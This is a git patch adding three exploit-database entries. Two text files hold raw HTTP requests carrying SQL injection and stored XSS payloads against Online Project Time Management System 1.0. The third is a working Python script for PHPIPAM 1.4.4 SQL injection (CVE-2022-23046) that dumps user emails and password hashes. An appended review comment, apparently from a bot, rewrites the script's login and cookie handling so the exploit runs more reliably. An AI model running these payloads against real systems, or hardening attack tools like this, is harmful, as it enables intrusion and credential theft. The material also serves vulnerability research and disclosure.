From f6940281e8b5d8d0e8121b7793685de8dd453766 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 26 Jan 2022 05:02:00 +0000
Subject: [PATCH] DB: 2022-01-26

3 changes to exploits/shellcodes

Online Project Time Management System 1.0 - SQLi (Authenticated)
Online Project Time Management System 1.0 - Multiple Stored Cross Site Scripting (XSS) (Authenticated)
PHPIPAM 1.4.4 - SQLi (Authenticated)
---
exploits/php/webapps/50682.txt | 106 +++++++++++++++++++++++++++
exploits/php/webapps/50683.txt | 129 +++++++++++++++++++++++++++++++++
exploits/php/webapps/50684.py | 84 +++++++++++++++++++++
files_exploits.csv | 3 +
4 files changed, 322 insertions(+)
create mode 100644 exploits/php/webapps/50682.txt
create mode 100644 exploits/php/webapps/50683.txt
create mode 100755 exploits/php/webapps/50684.py
diff --git a/exploits/php/webapps/50682.txt b/exploits/php/webapps/50682.txt
new file mode 100644
index 000000000..aa9c77893
--- /dev/null
+++ b/exploits/php/webapps/50682.txt
@@ -0,0 +1,106 @@
+# Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated)
+# Date: 19/01/2022
+# Exploit Author: Felipe Alcantara (Filiplain)
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: Kali Linux
+
+# Steps to reproduce
+# Log in as an employee
+# Go to : http://localhost/ptms/?page=user
+# Click Update
+# Save request in BurpSuite
+# Run saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump
+
+==========================
+POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
+Host: localhost
+Content-Length: 1362
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary39q8yel1pdwYRLNz
+Origin: http://localhost
+Referer: http://localhost/ptms/?page=user
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
+Connection: close
+
+
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="id"
+
+4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="code"
+
+2022-0003
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="generated_password"
+
+
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="firstname"
+
+Mark 2223
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="middlename"
+
+Z
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="lastname"
+
+Cooper
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="gender"
+
+Male
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="department"
+
+IT Department
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="position"
+
+Department Manager
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="email"
+
+mcooper@sample.com
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="password"
+
+
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary39q8yel1pdwYRLNz--
+
+
+
+
+==========================
+
+#Payloads
+#++++++++++++
+#Payload: (Boolean-Based Blind)
+
+#------WebKitFormBoundary39q8yel1pdwYRLNz
+#Content-Disposition: form-data; name="id"
+
+#4' or 1=1 --
+
+#--------
+
+#Payload: (time-based blind)
+
+#------WebKitFormBoundary39q8yel1pdwYRLNz
+#Content-Disposition: form-data; name="id"
+
+#4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test
+
+#-------
\ No newline at end of file
diff --git a/exploits/php/webapps/50683.txt b/exploits/php/webapps/50683.txt
new file mode 100644
index 000000000..4ecd19c3e
--- /dev/null
+++ b/exploits/php/webapps/50683.txt
@@ -0,0 +1,129 @@
+# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)
+# Date: 19/01/2022
+# Exploit Author: Felipe Alcantara (Filiplain)
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: Kali Linux
+# Description: Stored XSS in multiple fields...
+
+# Steps to reproduce (with employee Access)
+
+# Log in as an employee
+# Go to : http://localhost/ptms/?page=user
+# Add XSS payload to any field of the user's name.
+#Click Update
+
+
+=================
+POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
+Host: localhost
+Content-Length: 1339
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak
+Origin: http://localhost
+Referer: http://localhost/ptms/?page=user
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
+Connection: close
+
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="id"
+
+4
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="code"
+
+2022-0003
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="generated_password"
+
+
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="firstname"
+
+Mark
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="middlename"
+
+
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="lastname"
+
+Cooper
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="gender"
+
+Male
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="department"
+
+IT Department
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="position"
+
+Department Manager
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="email"
+
+mcooper@sample.com
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="password"
+
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+------WebKitFormBoundaryvsLkAfaBC64Uzoak--
+=================
+
+-----------------------------------------------------------------------------
+
+# Steps to reproduce (with Admin access)
+
+# Log in to the admin panel
+# Go to : http://localhost/ptms/admin/?page=system_info
+# Add XSS payload to the 'System Name' field
+#Click Update
+
+
+=================
+
+POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1
+Host: localhost
+Content-Length: 603
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq
+Origin: http://localhost
+Referer: http://localhost/ptms/admin/?page=system_info
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
+Connection: close
+
+------WebKitFormBoundaryCibB6pEzThjb4Zcq
+Content-Disposition: form-data; name="name"
+
+Online Project Time Management System - PHP
+------WebKitFormBoundaryCibB6pEzThjb4Zcq
+Content-Disposition: form-data; name="short_name"
+
+PTMS - PHP
+------WebKitFormBoundaryCibB6pEzThjb4Zcq
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryCibB6pEzThjb4Zcq
+Content-Disposition: form-data; name="cover"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryCibB6pEzThjb4Zcq--
+
+=================
\ No newline at end of file
diff --git a/exploits/php/webapps/50684.py b/exploits/php/webapps/50684.py
new file mode 100755
index 000000000..d33067c5f
--- /dev/null
+++ b/exploits/php/webapps/50684.py
@@ -0,0 +1,84 @@
+# Exploit Title: PHPIPAM 1.4.4 - SQLi (Authenticated)
+# Google Dork: [if applicable]
+# Date: 20/01/2022
+# Exploit Author: Rodolfo "Inc0gbyt3" Tavares
+# Vendor Homepage: https://github.com/phpipam/phpipam
+# Software Link: https://github.com/phpipam/phpipam
+# Version: 1.4.4
+# Tested on: Linux/Windows
+# CVE : CVE-2022-23046
+
+import requests
+import sys
+import argparse
+
+################
+"""
+Author of exploit: Rodolfo 'Inc0gbyt3' Tavares
+CVE: CVE-2022-23046
+Type: SQL Injection
+
+Usage:
+
+$ python3 -m pip install requests
+$ python3 exploit.py -u http://localhost:8082 -U -P
+"""
+###############
+
+__author__ = "Inc0gbyt3"
+
+menu = argparse.ArgumentParser(description="[+] Exploit for PHPIPAM Version: 1.4.4 Authenticated SQL Injection\n CVE-2022-23046")
+menu.add_argument("-u", "--url", help="[+] URL of target, example: https://phpipam.target.com", type=str)
+menu.add_argument("-U", "--user", help="[+] Username", type=str)
+menu.add_argument("-P", "--password", help="[+] Password", type=str)
+args = menu.parse_args()
+
+if len(sys.argv) < 3:
+ menu.print_help()
+
+target = args.url
+user = args.user
+password = args.password
+
+
+def get_token():
+ u = f"{target}/app/login/login_check.php"
+
+ try:
+ r = requests.post(u, verify=False, timeout=10, headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, data={"ipamusername":user, "ipampassword":password})
+ headers = r.headers['Set-Cookie']
+ headers_string = headers.split(';')
+ for s in headers_string:
+ if "phpipam" in s and "," in s: # double same cookie Check LoL
+ cookie = s.strip(',').lstrip()
+ return cookie
+ except Exception as e:
+ print(f"[+] {e}")
+
+
+def exploit_sqli():
+ cookie = get_token()
+ xpl = f"{target}/app/admin/routing/edit-bgp-mapping-search.php"
+ data = {
+ "subnet":'pwn"union select(select concat(@:=0x3a,(select+count(*) from(users)where(@:=concat(@,email,0x3a,password,"0x3a",2fa))),@)),2,3,user() -- -', # dios query dump all :)
+ "bgp_id":1
+ }
+
+ headers = {
+ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+ "Cookie": cookie
+ }
+
+ try:
+ r = requests.post(xpl, verify=False, timeout=10, headers=headers, data=data)
+ if "admin" in r.text or "rounds" in r.text:
+ print("[+] Vulnerable..\n\n")
+ print(f"> Users and hash passwords: \n\n{r.text}")
+ print("\n\n> DONE <")
+ except Exception as e:
+ print(f"[-] {e}")
+
+
+
+if __name__ == '__main__':
+ exploit_sqli()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b2baf55d8..3ab4ef029 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44759,3 +44759,6 @@ id,file,description,date,author,type,platform,port
 50677,exploits/php/webapps/50677.txt,"Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50678,exploits/php/webapps/50678.txt,"Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50681,exploits/php/webapps/50681.txt,"Landa Driving School Management System 2.0.1 - Arbitrary File Upload",1970-01-01,"Sohel Yousef",webapps,php,
+50682,exploits/php/webapps/50682.txt,"Online Project Time Management System 1.0 - SQLi (Authenticated)",1970-01-01,"Felipe Alcantara",webapps,php,
+50683,exploits/php/webapps/50683.txt,"Online Project Time Management System 1.0 - Multiple Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Felipe Alcantara",webapps,php,
+50684,exploits/php/webapps/50684.py,"PHPIPAM 1.4.4 - SQLi (Authenticated)",1970-01-01,"Rodolfo Tavares",webapps,php,
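Review bot: `get_token()` returns `None` on every failure path — a login response without `Set-Cookie` raises `KeyError`, which the broad `except Exception` prints under the success prefix `[+]`, and a response whose cookies do not satisfy `"phpipam" in s and "," in s` simply falls off the end of the loop — so `exploit_sqli()` then sends `"Cookie": None` and a wrong password surfaces as an unrelated requests error instead of a clear message. Splitting the joined `Set-Cookie` string on `;` and `,` also depends on how requests concatenates repeated headers; the response already carries a cookie jar, so return `r.cookies`, exit when it is empty, and hand it to the second request as `cookies=`. `verify=False` on both calls disables certificate validation by default, which means the operator's credentials are posted to whatever answers at `target`; make that an explicit `--insecure` opt-in. The `if len(sys.argv) < 3: menu.print_help()` check neither exits nor marks the arguments `required=True`, so `target` can be `None` and the URL becomes `None/app/login/login_check.php`; `required=True` on `-u`/`-U`/`-P` removes the check entirely.
```python
menu.add_argument("--insecure", action="store_true", help="skip TLS certificate verification (off by default)")
# … unchanged: remaining argparse setup, target/user/password assignment …

def get_token():
    """Log in and return the session cookie jar; exit instead of returning None on failure."""
    u = f"{target}/app/login/login_check.php"
    login_headers = {
        # … unchanged: User-Agent / Content-Type values …
    }
    try:
        r = requests.post(u, verify=not args.insecure, timeout=10, headers=login_headers,
                          data={"ipamusername": user, "ipampassword": password})
    except requests.RequestException as e:
        raise SystemExit(f"[-] login request failed: {e}")
    if not r.cookies:
        raise SystemExit("[-] login returned no session cookie (wrong credentials or URL?)")
    return r.cookies

def exploit_sqli():
    cookie = get_token()
    # … unchanged: xpl, data …
    headers = {
        # … unchanged: User-Agent / Content-Type … ("Cookie" entry dropped)
    }
    try:
        r = requests.post(xpl, verify=not args.insecure, timeout=10, headers=headers, cookies=cookie, data=data)
        # … unchanged: response check and output …
```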